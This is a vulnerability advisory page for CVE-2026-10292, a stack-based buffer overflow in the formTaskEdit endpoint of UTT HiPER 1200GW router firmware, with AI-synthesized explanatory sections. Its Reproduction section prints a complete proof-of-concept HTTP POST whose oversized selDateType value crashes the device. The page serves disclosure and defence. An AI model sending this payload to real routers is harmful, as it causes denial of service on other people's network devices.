CVE-2026-10292
Description
UTT HiPER 1200GW routers are vulnerable to a stack-based buffer overflow in the /goform/formTaskEdit endpoint, allowing remote attackers to cause a denial of service.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
UTT HiPER 1200GW routers are vulnerable to a stack-based buffer overflow in the `/goform/formTaskEdit` endpoint, allowing remote attackers to cause a denial of service.
Vulnerability
A stack-based buffer overflow vulnerability exists in UTT HiPER 1200GW routers up to version 2.5.3-170306. The vulnerability resides in the strcpy function within the /goform/formTaskEdit file. When the selDateType parameter is set to 01, the function is called without proper boundary checks, leading to the overflow.
Exploitation
An attacker can remotely exploit this vulnerability by sending a crafted HTTP POST request to the /goform/formTaskEdit endpoint. The request must manipulate the selDateType parameter to trigger the vulnerable strcpy function. The provided Proof of Concept (POC) demonstrates sending a large string value for selDateType to cause the overflow [1].
Impact
Successful exploitation of this vulnerability can lead to a denial of service (DoS) on the affected device. The buffer overflow can crash the device or disrupt its normal operation. The exact impact beyond DoS is not detailed in the available references.
Mitigation
The affected firmware version is 2.5.3-170306 and earlier for the UTT HiPER 1200GW router. A patched version is not yet disclosed in the available references. Users are advised to check the vendor's website for updates or advisories. No workarounds are currently published.
AI Insight generated on Jun 1, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: <=2.5.3-170306
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The strcpy function is used without proper boundary checks, leading to a stack-based buffer overflow."
Attack vector
An attacker can remotely trigger this vulnerability by sending a crafted POST request to the `/goform/formTaskEdit` endpoint [ref_id=1]. The request includes an overly long string in the `selDateType` parameter, which is then copied using `strcpy` without validating its size [ref_id=1]. This lack of boundary detection allows the input to overwrite adjacent memory on the stack, leading to a buffer overflow [ref_id=1].
Affected code
The vulnerability resides in the `/goform/formTaskEdit` file, specifically within the code that handles the `selDateType` parameter. The vulnerable operation is `strcpy(InstPointByIndex + 20, src);`, which is executed when `selDateType` is '01' and lacks boundary detection [ref_id=1].
What the fix does
The patch is not available in the provided information. The advisory indicates that the vulnerability is caused by the use of `strcpy` without boundary checks in the `/goform/formTaskEdit` file when `selDateType` is '01' [ref_id=1]. Remediation would involve implementing proper size checks before copying data to prevent overflow.
Preconditions
- authThe attacker needs to have at least limited privileges to send requests to the affected endpoint.
- networkThe vulnerability can be exploited remotely over the network.
Reproduction
POST /goform/formTaskEdit HTTP/1.1 Host: 192.168.1.1 Content-Length: 1822 Cache-Control: max-age=0 Authorization: Digest username="admin", realm="UTT", nonce="91350026511f147977ce8ea9363e038c", uri="/goform/formArpBindGlobalConfig", algorithm=MD5, response="3c90b3b4d198905f88cf1301ff8ad6b5", opaque="5ccc069c403ebaf9f0171e9517f40e41", qop=auth, nc=000001a1, cnonce="71e33390dc75c484" Origin: http://192.168.1.1 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.1/IPMac.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: language=zhcn; utt_bw_rdevType=; td_cookie=9472310938 Connection: close
Action=add&selDateType=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa [ref_id=1]
Generated on Jun 1, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5News mentions
0No linked articles in our index yet.